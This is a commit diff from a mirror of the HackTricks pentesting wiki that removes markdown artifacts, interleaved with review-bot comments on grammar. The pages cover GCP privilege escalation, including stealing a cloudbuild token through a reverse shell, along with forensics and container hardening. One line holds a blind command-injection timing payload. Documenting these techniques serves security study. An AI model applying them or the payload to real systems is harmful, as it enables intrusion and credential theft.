mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 12:13:17 +00:00
remove ****
This commit is contained in:
parent
ce6088de55
commit
53c42a509d
66 changed files with 108 additions and 108 deletions
@ -310,7 +310,7 @@ Also keep an eye out for instances that have the default service account assigne
Google states very clearly [**"Access scopes are not a security mechanism… they have no effect when making requests not authenticated through OAuth"**](https://cloud.google.com/compute/docs/access/service-accounts#accesscopesiam).
Therefore, if you **find a** [**service account key**](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) **** stored on the instance you can bypass the limitation. These are **RSA private keys** that can be used to authenticate to the Google Cloud API and **request a new OAuth token with no scope limitations**.
Therefore, if you **find a** [**service account key**](https://cloud.google.com/iam/docs/creating-managing-service-account-keys) stored on the instance you can bypass the limitation. These are **RSA private keys** that can be used to authenticate to the Google Cloud API and **request a new OAuth token with no scope limitations**.
Check if any service account has exported a key at some point with:
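Review bot: the bold markup on the new "Therefore, if you **find a** [**service account key**] ..." line still splits the phrase awkwardly; bolding only "service account key" (or the whole "find a service account key") reads better than "**find a** [**service account key**]". The substantive claim on that line is right and consistent with the Google quote above it: an exported SA private key lets you request a token with no scope limitations, so the instance's access scopes do not constrain it.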
@ -90,7 +90,7 @@ If you compromises a compute instance you should also check the actions mentione
gcloud compute images list --no-standard-images
```
You can then **** [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation:
You can then [**export**](https://cloud.google.com/sdk/gcloud/reference/compute/images/export) **the virtual disks** from any image in multiple formats. The following command would export the image `test-image` in qcow2 format, allowing you to download the file and build a VM locally for further investigation:
```bash
gcloud compute images export --image test-image \
@ -47,7 +47,7 @@ Note that according to the [**documentation**](https://cloud.google.com/iam/docs
### iam.serviceAccounts.signBlob
The _iam.serviceAccounts.signBlob_ permission “allows signing of arbitrary payloads” in GCP. This means we can **create an unsigined JWT of the SA and then send it as a blob to get the JWT signed** by the SA **** we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed).
The _iam.serviceAccounts.signBlob_ permission “allows signing of arbitrary payloads” in GCP. This means we can **create an unsigined JWT of the SA and then send it as a blob to get the JWT signed** by the SA we are targeting. For more information [**read this**](https://medium.com/google-cloud/using-serviceaccountactor-iam-role-for-account-impersonation-on-google-cloud-platform-a9e7118480ed).
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/6-iam.serviceAccounts.signBlob.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-accessToken.py) and [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.signBlob-gcsSignedUrl.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
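Review bot: the new line keeps the typo "unsigined" in "create an unsigined JWT of the SA"; since the line is being rewritten anyway, change it to "unsigned".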
@ -146,7 +146,7 @@ This is like the previous abuse but instead of directly creating a new deploymen
With this permission you can **submit a cloud build**. The cloudbuild machine will have in it’s filesystem by **default a token of the powerful cloudbuild Service Account**: `<PROJECT_NUMBER>@cloudbuild.gserviceaccount.com` . However, you can **indicate any service account inside the project** in the cloudbuild configuration.\
Therefore, you can just make the machine exfiltrate to your server the token or **get a reverse shell inside of it and get yourself the token** (the file containing the token might change).
You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) **** (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) **** and a python script to get a reverse shell inside of the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.py) **** (in the code you can find how to specify other service accounts)**.**
You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside of the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp\_privesc\_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.**
For a more in-depth explanation visit [https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/](https://rhinosecuritylabs.com/gcp/iam-privilege-escalation-gcp-cloudbuild/)
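Review bot: the new line still ends with the bolded period "**.**" after "(in the code you can find how to specify other service accounts)", which is the same export artifact this commit is removing; drop the bold there too. The context line above has "in it’s filesystem", which should be "its".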
@ -38,7 +38,7 @@ In this exam I **missed the opportunity to exploit more vulnerabilities**, howev
This course is the one meant to **prepare** you for the **eWPTXv2** **certificate** **exam**. \
Even having been working as web pentester for several years before doing the course, it taught me several **neat hacking tricks about "weird" web vulnerabilities and ways to bypass protections**. Moreover, the course contains **pretty nice labs where you can practice what you learn**, and that is always helpful to fully understand the vulnerabilities.
I think this course **isn't for web hacking beginners** (there are other INE courses for that like [**Web Application Penetration Testing**](https://my.ine.com/CyberSecurity/courses/38316560/web-application-penetration-testing)**).** However, **** if you aren't a beginner, independently on the hacking web "level" you think you have, **I definitely recommend you to take a look to the course** because I'm sure you **will learn new things** like I did.
I think this course **isn't for web hacking beginners** (there are other INE courses for that like [**Web Application Penetration Testing**](https://my.ine.com/CyberSecurity/courses/38316560/web-application-penetration-testing)**).** However, if you aren't a beginner, independently on the hacking web "level" you think you have, **I definitely recommend you to take a look to the course** because I'm sure you **will learn new things** like I did.
### [eWPTXv2](https://elearnsecurity.com/product/ewptxv2-certification/)
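Review bot: the new line keeps "**).**" (a bolded parenthesis and period) after the INE course link, another leftover of the same kind; while touching the line, "take a look to the course" should be "take a look at the course" and "independently on the hacking web "level" you think you have" reads better as "whatever web hacking level you think you have".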
@ -56,13 +56,13 @@ It's a very interesting basic course about **how to use the ML environment provi
## Course: **Machine Learning with scikit-learn Starter Pass**
In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) **** you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**. 
In the course [**Machine Learning with scikit-learn Starter Pass**](https://my.ine.com/DataScience/courses/58c4e71b/machine-learning-with-scikit-learn-starter-pass) you will learn, as the name indicates, **how to use scikit-learn to create Machine Learning models**. 
It's definitely recommended for people that haven't use scikit-learn (but know python)
## **Course: Classification Algorithms**
The **** [**Classification Algorithms course**](https://my.ine.com/DataScience/courses/2c6de5ea/classification-algorithms) **** is a great course for people that is **starting to learn about machine learning**. Here you will find information about the main classification algorithms you need to know and some mathematical concepts like **logistic regression** and **gradient descent**, **KNN**, **SVM**, and **Decision trees**.
The [**Classification Algorithms course**](https://my.ine.com/DataScience/courses/2c6de5ea/classification-algorithms) is a great course for people that is **starting to learn about machine learning**. Here you will find information about the main classification algorithms you need to know and some mathematical concepts like **logistic regression** and **gradient descent**, **KNN**, **SVM**, and **Decision trees**.
It also shows how to **create models** with with **scikit-learn.**
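Review bot: grammar slips remain on lines this commit does not touch: "people that haven't use scikit-learn" should be "haven't used", "people that is starting" should be "people who are starting", and "create models with with scikit-learn" doubles "with". The new "Machine Learning with scikit-learn Starter Pass" line also keeps a trailing space after "models.".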
@ -127,7 +127,7 @@ openssl x509 -inform der -in certificatename.der -out certificatename.pem
**Convert PEM to P7B**
**Note:** The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c. **** A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key. The most common platforms that support P7B files are Microsoft Windows and Java Tomcat.
**Note:** The PKCS#7 or P7B format is stored in Base64 ASCII format and has a file extension of .p7b or .p7c. A P7B file only contains certificates and chain certificates (Intermediate CAs), not the private key. The most common platforms that support P7B files are Microsoft Windows and Java Tomcat.
```
openssl crl2pkcs7 -nocrl -certfile certificatename.pem -out certificatename.p7b -certfile CACert.cer
@ -87,7 +87,7 @@ dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers>
### Dive
In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) **** (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility:
```bash
#First you need to load the image in your docker repo
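Review bot: the new line pins the download link to a fixed tag (releases/tag/v0.10.0); linking to the releases page without a tag avoids the link going stale as dive moves on. Also "use the dive (download it from releases) utility" reads better as "use the dive utility (download it from releases)".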
@ -248,9 +248,9 @@ Look in all available log files on the compromised system for traces of maliciou
**Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\
Interesting system logons:
*  **/var/log/syslog** (debian) **** or **/var/log/messages** (Redhat)
*  **/var/log/syslog** (debian) or **/var/log/messages** (Redhat)
* Shows general messages and info regarding the system. Basically a data log of all activity throughout the global system.
*  **/var/log/auth.log** (debian) **** or **/var/log/secure** (Redhat)
*  **/var/log/auth.log** (debian) or **/var/log/secure** (Redhat)
* Keep authentication logs for both successful or failed logins, and authentication processes. Storage depends on system type.
* `cat /var/log/auth.log | grep -iE "session opened for|accepted password|new session|not in sudoers"`
* **/var/log/boot.log**: start-up messages and boot info.
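Review bot: the context line "Interesting system logons:" introduces a list of log files, so it should read "Interesting system logs:". The new "/var/log/syslog" and "/var/log/auth.log" bullets also keep a double space after the "*", which renders as a stray leading space in the list item.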
@ -69,12 +69,12 @@ clamscan folderpath #Scan the hole folder
IOC means Indicator Of Compromise. An IOC is a set of **conditions that identifies** some potentially unwanted software or a confirmed **malware**. Blue Teams use this kind of definitions to **search for this kind of malicious files** in their **systems** and **networks**.\
To share these definitions is very useful as when a malware is identified in a computer and an IOC for that malware is created, other Blue Teams can use it to identify the malware faster.
A tool to create or modify IOCs is **** [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
****You can use tools such as **** [**Redline**](https://www.fireeye.com/services/freeware/redline.html) **** to **search for defined IOCs in a device**.
A tool to create or modify IOCs is [**IOC Editor**](https://www.fireeye.com/services/freeware/ioc-editor.html)**.**\
****You can use tools such as [**Redline**](https://www.fireeye.com/services/freeware/redline.html) to **search for defined IOCs in a device**.
### Loki
****[**Loki**](https://github.com/Neo23x0/Loki) **** is a scanner for Simple Indicators of Compromise.\
****[**Loki**](https://github.com/Neo23x0/Loki) is a scanner for Simple Indicators of Compromise.\
Detection is based on four detection methods:
```
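Review bot: the commit leaves the leading "****" on two of the new lines: "****You can use tools such as [**Redline**]" and "****[**Loki**](...) is a scanner". Both should drop the leading marker as well, or the rendered page still shows it. On the context line, "this kind of definitions" should be "these definitions".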
@ -164,7 +164,7 @@ The **root directory** occupies a **specific position** for both FAT12 and FAT16
* Address of the FAT table where the first cluster of the file starts
* Size
When a file is "deleted" using a FAT file system, the directory entry remains almost **unchanged** except for the **first character of the file name** (modified to **** 0xE5), preserving most of the "deleted" file's name, along with its time stamp, file length and — most importantly — its physical location on the disk. The list of disk clusters occupied by the file will, however, be erased from the File Allocation Table, marking those sectors available for use by other files created or modified thereafter. In case of FAT32, it is additionally erased field responsible for upper 16 bits of file start cluster value.
When a file is "deleted" using a FAT file system, the directory entry remains almost **unchanged** except for the **first character of the file name** (modified to 0xE5), preserving most of the "deleted" file's name, along with its time stamp, file length and — most importantly — its physical location on the disk. The list of disk clusters occupied by the file will, however, be erased from the File Allocation Table, marking those sectors available for use by other files created or modified thereafter. In case of FAT32, it is additionally erased field responsible for upper 16 bits of file start cluster value.
### **NTFS**
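Review bot: the last sentence of the new line is garbled: "In case of FAT32, it is additionally erased field responsible for upper 16 bits of file start cluster value." Suggest "In FAT32, the field holding the upper 16 bits of the starting cluster number is additionally cleared."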
@ -142,7 +142,7 @@ Some interesting attributes:
![](<../../../.gitbook/assets/image (512).png>)
Another useful tool to analyze the MFT is [**MFT2csv**](https://github.com/jschicht/Mft2Csv) **** (select the mft file or the image and press dump all and extract to extract al the objects).\
Another useful tool to analyze the MFT is [**MFT2csv**](https://github.com/jschicht/Mft2Csv) (select the mft file or the image and press dump all and extract to extract al the objects).\
This program will extract all the MFT data and present it in CSV format. It can also be used to dump the files.
![](<../../../.gitbook/assets/image (513).png>)
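Review bot: the new line has "extract al the objects"; change to "all". The parenthetical would also read better as "(select the MFT file or the image, press Dump all, then Extract to extract all the objects)".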
@ -28,7 +28,7 @@ You can find some Wireshark trick in:
### Xplico Framework
****[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ **** can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
****[**Xplico** ](https://github.com/xplico/xplico)_(only linux)_ can **analyze** a **pcap** and extract information from it. For example, from a pcap file Xplico extracts each email (POP, IMAP, and SMTP protocols), all HTTP contents, each VoIP call (SIP), FTP, TFTP, and so on.
#### Install
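Review bot: the new line still starts with "****" ("****[**Xplico** ](...)"), and the link text has a stray space before "]"; both should go along with the trailing marker this commit removes.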
@ -48,7 +48,7 @@ Inside the folder **of each profile** (_\~/.mozilla/firefox/\<ProfileName>/_) pa
* _**handlers.json**_ : Protocol handlers (like, which app is going to handle _mailto://_ protocol)
* _**persdict.dat**_ : Words added to the dictionary
* _**addons.json**_ and _**extensions.sqlite** _ : Installed addons and extensions
* _**cookies.sqlite**_ : Contains **cookies.** [**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html) **** can be used in Windows to inspect this file.
* _**cookies.sqlite**_ : Contains **cookies.** [**MZCookiesView**](https://www.nirsoft.net/utils/mzcv.html) can be used in Windows to inspect this file.
* _**cache2/entries**_ or _**startupCache**_ : Cache data (\~350MB). Tricks like **data carving** can also be used to obtain the files saved in the cache. [MozillaCacheView](https://www.nirsoft.net/utils/mozilla\_cache\_viewer.html) can be used to see the **files saved in the cache**.
 Information that can be obtained:
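Review bot: the context line "_**extensions.sqlite** _" has a space between "**" and "_", which breaks the italic/bold nesting; it should be "_**extensions.sqlite**_". The "Information that can be obtained:" line at the end of the hunk also starts with a stray leading space.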
@ -96,7 +96,7 @@ Most of the information will be saved inside the _**Default/**_ or _**ChromeDefa
* Reloaded
* _**Cookies**_ : Cookies. [ChromeCookiesView](https://www.nirsoft.net/utils/chrome\_cookies\_view.html) can be used to inspect the cookies.
* _**Cache**_ : Cache. In Windows you can use the tool [ChromeCacheView](https://www.nirsoft.net/utils/chrome\_cache\_view.html) to inspect the ca
* _**Bookmarks**_ : **** Bookmarks 
* _**Bookmarks**_ : Bookmarks 
* _**Web Data**_ : Form History
* _**Favicons**_ : Favicons
* _**Login Data**_ : Login information (usernames, passwords...)
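Review bot: the new "_**Bookmarks**_ : Bookmarks " line keeps a trailing space, and the context line for "_**Cache**_" ends mid-word ("to inspect the ca"); confirm the source line is complete before this lands.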
@ -99,11 +99,11 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] ****[**Sudo/SUID binary without path indicated**](privilege-escalation/#sudo-command-suid-binary-without-command-path)?
* [ ] ****[**SUID binary specifying path**](privilege-escalation/#suid-binary-with-command-path)? Bypass
* [ ] ****[**LD\_PRELOAD vuln**](privilege-escalation/#ld\_preload)****
* [ ] ****[**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) **** from a writable folder?
* [ ] ****[**Lack of .so library in SUID binary**](privilege-escalation/#suid-binary-so-injection) from a writable folder?
* [ ] ****[**SUDO tokens available**](privilege-escalation/#reusing-sudo-tokens)? [**Can you create a SUDO token**](privilege-escalation/#var-run-sudo-ts-less-than-username-greater-than)?
* [ ] Can you [**read or modify sudoers files**](privilege-escalation/#etc-sudoers-etc-sudoers-d)?
* [ ] Can you [**modify /etc/ld.so.conf.d/**](privilege-escalation/#etc-ld-so-conf-d)?
* [ ] [**OpenBSD DOAS**](privilege-escalation/#doas) **** command
* [ ] [**OpenBSD DOAS**](privilege-escalation/#doas) command
### [Capabilities](privilege-escalation/#capabilities)
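Review bot: three context lines in this hunk still carry the marker the commit is removing: "* [ ] ****[**Sudo/SUID binary without path indicated**]", "* [ ] ****[**SUID binary specifying path**]" and "* [ ] ****[**LD\_PRELOAD vuln**](...)****" (leading and trailing). Only the ".so library" and "DOAS" bullets were cleaned; a search for "****" across the checklist would catch the rest.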
@ -150,8 +150,8 @@ If you want to **share some tricks with the community** you can also submit **pu
* [ ] Can you [**abuse NFS to escalate privileges**](privilege-escalation/#nfs-privilege-escalation)?
* [ ] Do you need to [**escape from a restrictive shell**](privilege-escalation/#escaping-from-restricted-shells)?
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, **** join the [💬](https://emojipedia.org/speech-balloon/) **** [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
****If you want to **share some tricks with the community** you can also submit **pull requests** to **** [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) **** that will be reflected in this book.\
If you want to **know** about my **latest modifications**/**additions** or you have **any suggestion for HackTricks or PEASS**, join the [💬](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass), or **follow me on Twitter** [🐦](https://emojipedia.org/bird/)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**\
****If you want to **share some tricks with the community** you can also submit **pull requests** to [**https://github.com/carlospolop/hacktricks**](https://github.com/carlospolop/hacktricks) that will be reflected in this book.\
Don't forget to **give ⭐ on the github** to motivate me to continue developing this book.
![](<../.gitbook/assets/68747470733a2f2f7777772e6275796d6561636f666665652e636f6d2f6173736574732f696d672f637573746f6d5f696d616765732f6f72616e67655f696d672e706e67 (6) (4) (3).png>)
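Review bot: the new line "****If you want to **share some tricks with the community**" still starts with "****"; the commit removed the two markers mid-line but not the leading one.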
@ -290,7 +290,7 @@ If you’re using [Kubernetes](https://kubernetes.io/docs/concepts/configuration
* **Do not use the `--privileged` flag or mount a** [**Docker socket inside the container**](https://raesene.github.io/blog/2016/03/06/The-Dangers-Of-Docker.sock/)**.** The docker socket allows for spawning containers, so it is an easy way to take full control of the host, for example, by running another container with the `--privileged` flag.
* Do **not run as root inside the container. Use a** [**different user**](https://docs.docker.com/develop/develop-images/dockerfile\_best-practices/#user) **and** [**user namespaces**](https://docs.docker.com/engine/security/userns-remap/)**.** The root in the container is the same as on host unless remapped with user namespaces. It is only lightly restricted by, primarily, Linux namespaces, capabilities, and cgroups.
* [**Drop all capabilities**](https://docs.docker.com/engine/reference/run/#runtime-privilege-and-linux-capabilities) **(`--cap-drop=all`) and enable only those that are required** (`--cap-add=...`). Many of workloads don’t need any capabilities and adding them increases the scope of a potential attack.
* [**Use the “no-new-privileges” security option**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) **** to prevent processes from gaining more privileges, for example through suid binaries.
* [**Use the “no-new-privileges” security option**](https://raesene.github.io/blog/2019/06/01/docker-capabilities-and-no-new-privs/) to prevent processes from gaining more privileges, for example through suid binaries.
* ****[**Limit resources available to the container**](https://docs.docker.com/engine/reference/run/#runtime-constraints-on-resources)**.** Resource limits can protect the machine from denial of service attacks.
* **Adjust** [**seccomp**](https://docs.docker.com/engine/security/seccomp/)**,** [**AppArmor**](https://docs.docker.com/engine/security/apparmor/) **(or SELinux)** profiles to restrict the actions and syscalls available for the container to the minimum required.
* **Use** [**official docker images**](https://docs.docker.com/docker-hub/official\_images/) **and require signatures** or build your own based on them. Don’t inherit or use [backdoored](https://arstechnica.com/information-technology/2018/06/backdoored-images-downloaded-5-million-times-finally-removed-from-docker-hub/) images. Also store root keys, passphrase in a safe place. Docker has plans to manage keys with UCP.
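Review bot: the context bullet "* ****[**Limit resources available to the container**]" still carries the leading marker and should be cleaned with the rest. On the "--cap-drop=all" bullet, "Many of workloads" should be "Many workloads".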
@ -13,7 +13,7 @@ seccomp mode is **enabled via the `prctl(2)` system call** using the `PR_SET_SEC
### **Original/Strict Mode**
In this mode **** Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL
In this mode Seccomp **only allow the syscalls** `exit()`, `sigreturn()`, `read()` and `write()` to already-open file descriptors. If any other syscall is made, the process is killed using SIGKILL
{% code title="seccomp_strict.c" %}
```c
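Review bot: the new line reads "In this mode Seccomp **only allow the syscalls**"; it should be "only allows", and a comma after "In this mode" would help.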
@ -1420,7 +1420,7 @@ while True:
### CAP\_NET\_ADMIN + CAP\_NET\_RAW
[**CAP\_NET\_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) **** allows the capability holder to **modify the exposed network namespaces' firewall, routing tables, socket permissions**, network interface configuration and other related settings on exposed network interfaces. This also provides the ability to **enable promiscuous mode** for the attached network interfaces and potentially sniff across namespaces.
[**CAP\_NET\_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows the capability holder to **modify the exposed network namespaces' firewall, routing tables, socket permissions**, network interface configuration and other related settings on exposed network interfaces. This also provides the ability to **enable promiscuous mode** for the attached network interfaces and potentially sniff across namespaces.
#### Example with binary
@ -1480,7 +1480,7 @@ sudo chattr -i file.txt
### CAP\_SYS\_CHROOT
[**CAP\_SYS\_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) **** permits the use of the `chroot(2)` system call. This may allow escaping of any `chroot(2)` environment, using known weaknesses and escapes:
[**CAP\_SYS\_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) permits the use of the `chroot(2)` system call. This may allow escaping of any `chroot(2)` environment, using known weaknesses and escapes:
* [How to break out from various chroot solutions](https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf)
* [chw00t: chroot escape tool](https://github.com/earthquake/chw00t/)
@ -128,7 +128,7 @@ time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
## DNS data exfiltration
You could use **burpcollab** or [**pingb**](http://pingb.in) **** for example.
You could use **burpcollab** or [**pingb**](http://pingb.in) for example.
## Polyglot command injection
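Review bot: "burpcollab" on the new line is an informal name; spell out Burp Collaborator so readers can find the tool.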
@ -78,7 +78,7 @@ On the **other** hand, many familiar pieces of Mac OS X are **not open source**.
### **Universal binaries**
Mac OS binaries usually are compiled as universal binaries. **** A **universal binary** can **support multiple architectures in the same file**.
Mac OS binaries usually are compiled as universal binaries. A **universal binary** can **support multiple architectures in the same file**.
```bash
file /bin/ls
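Review bot: "Mac OS binaries usually are compiled as universal binaries" on the new line reads better as "Mac OS binaries are usually compiled as universal binaries".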
@ -145,7 +145,7 @@ _A segment defines a **range of bytes** in a Mach-O file and the **addresses** a
Common segments:
* **`__TEXT`**: Contains **executable** **code** and **data** that is **read-only.** Common sections of this segment:
* `__text`: **** Compiled binary code
* `__text`: Compiled binary code
* `__const`: Constant data
* `__cstring`: String constants
* **`__DATA`**: Contains data that is **writable.**
@ -155,7 +155,7 @@ Common segments:
* **`__LINKEDIT`**: Contains information for the linker (dyld) such as, "symbol, string, and relocation table entries."
* **`__OBJC`**: Contains information used by the Objective-C runtime. Though this information might also be found in the \_\_DATA segment, within various in \_\_objc\_\* sections.
* **`LC_MAIN`**: Contains the entrypoint in the **entryoff attribute.** At load time, **dyld** simply **adds** this value to the (in-memory) **base of the binary**, then **jumps** to this instruction to kickoff execution of the binary’s code.
* **`LC_LOAD_DYLIB`**: **** This load command describes a **dynamic** **library** dependency which **instructs** the **loader** (dyld) to l**oad and link said library**. There is a LC\_LOAD\_DYLIB load command **for each library** that the Mach-O binary requires.
* **`LC_LOAD_DYLIB`**: This load command describes a **dynamic** **library** dependency which **instructs** the **loader** (dyld) to l**oad and link said library**. There is a LC\_LOAD\_DYLIB load command **for each library** that the Mach-O binary requires.
* This load command is a structure of type **`dylib_command`** (which contains a struct dylib, describing the actual dependent dynamic library):
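Review bot: on the new line the bold marker splits a word: "to l**oad and link said library**" should be "to **load and link said library**". The context line for "__OBJC" also has "within various in \_\_objc\_\* sections", which should be "within various \_\_objc\_\* sections".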
@ -261,10 +261,10 @@ Note that this names can be obfuscated to make the reversing of the binary more
There are some projects that allow to generate a binary executable by MacOS containing script code which will be executed. Some examples are:
* **Platypus**: Generate MacOS binary executing **** shell scripts, Python, Perl, Ruby, PHP, Swift, Expect, Tcl, AWK, JavaScript, AppleScript or any other user-specified interpreter.
* **Platypus**: Generate MacOS binary executing shell scripts, Python, Perl, Ruby, PHP, Swift, Expect, Tcl, AWK, JavaScript, AppleScript or any other user-specified interpreter.
* **It saves the script in `Contents/Resources/script`. So finding this script is a good indicator that Platypus was used.**
* **PyInstaller:** Python
* Ways to detect this is the use of the embedded **** string **“Py\_SetPythonHome”** or a a **call** into a function named **`pyi_main`.**
* Ways to detect this is the use of the embedded string **“Py\_SetPythonHome”** or a a **call** into a function named **`pyi_main`.**
* **Electron:** JavaScript, HTML, and CSS.
* These binaries will use **Electron Framework.framework**. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in `.asar` files. These binaries will use Electron Framework.framework. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in **`.asar` files**. It's possible **unpack** such archives via the **asar** node module, or the **npx** **utility:** `npx asar extract StrongBox.app/Contents/Resources/app.asar appUnpacked`\
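Review bot: the new PyInstaller line has "a a **call**" (doubled "a") and "Ways to detect this is" (plural subject, singular verb); suggest "One way to detect this is the embedded string "Py\_SetPythonHome" or a call into a function named `pyi_main`." The Electron context line below repeats its first two sentences verbatim and says "achieved in .asar files" where "archived" is meant.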
@ -264,7 +264,7 @@ sudo launchctl load -w /System/Library/LaunchDaemons/ssh.plist
### Internal Handlers
[**Checkout this section**](./#file-extensions-apps) **** to find out how you can find which app is responsible of **handling the specified scheme or protocol**.
[**Checkout this section**](./#file-extensions-apps) to find out how you can find which app is responsible of **handling the specified scheme or protocol**.
### Enumerating Network Processes
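Review bot: on the new line, "Checkout this section" should be "Check out this section" and "responsible of handling" should be "responsible for handling".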
@ -2,7 +2,7 @@
## Intro
As **** [**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
|
||||
As [**previously commented**](./#what-is-mdm-mobile-device-management)**,** in order to try to enrol a device into an organization **only a Serial Number belonging to that Organization is needed**. Once the device is enrolled, several organizations will install sensitive data on the new device: certificates, applications, WiFi passwords, VPN configurations [and so on](https://developer.apple.com/enterprise/documentation/Configuration-Profile-Reference.pdf).\
|
||||
Therefore, this could be a dangerous entrypoint for attackers if the enrolment process isn't correctly protected.
|
||||
|
||||
**The following research is taken from** [**https://duo.com/labs/research/mdm-me-maybe**](https://duo.com/labs/research/mdm-me-maybe)****
|
||||
|
|
|
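Review bot: the new line keeps the bold comma `**,**` immediately after `[**previously commented**](./#what-is-mdm-mobile-device-management)`, which is the same GitBook export residue this commit removes elsewhere; a plain comma is intended. The last context line of the hunk, `**The following research is taken from** [**https://duo.com/labs/research/mdm-me-maybe**](...)****`, still ends with a trailing `****` that this change does not touch.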
@ -830,7 +830,7 @@ f(42)
|
|||
|
||||
## Decompiling Compiled Python
|
||||
|
||||
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) **** one can **decompile** given compiled python code.
|
||||
Using tools like [**https://www.decompiler.com/**](https://www.decompiler.com) one can **decompile** given compiled python code.
|
||||
|
||||
**Check out this tutorial**:
|
||||
|
||||
|
|
|
@ -184,7 +184,7 @@ C:\Users\<UserName>\AppData\Local\Android\Sdk\tools\emulator.exe -avd "AVD9" -ht
|
|||
|
||||
### Command line options
|
||||
|
||||
However there are **a lot of different command line useful options** that you can use to initiate a virtual machine. Below you can find some interesting options but can **** [**find a complete list here**](https://developer.android.com/studio/run/emulator-commandline)
|
||||
However there are **a lot of different command line useful options** that you can use to initiate a virtual machine. Below you can find some interesting options but can [**find a complete list here**](https://developer.android.com/studio/run/emulator-commandline)
|
||||
|
||||
#### Boot
|
||||
|
||||
|
|
|
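Review bot: the new line reads `Below you can find some interesting options but can [**find a complete list here**](...)`, which is missing its subject; `but you can find a complete list here` with a closing period reads correctly.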
@ -105,7 +105,7 @@ If `addJavascriptInterface` is necessary, take the following considerations:
|
|||
|
||||
### Javascript Bridge to RCE via Reflection
|
||||
|
||||
As noted in [**this research** ](https://labs.f-secure.com/archive/webview-addjavascriptinterface-remote-code-execution/)(_check it for ideas in case you obtain RCE_) **** once you found a JavascriptBridge it may be possible to obtain **RCE** via **Reflection** using a payload like the following one:
|
||||
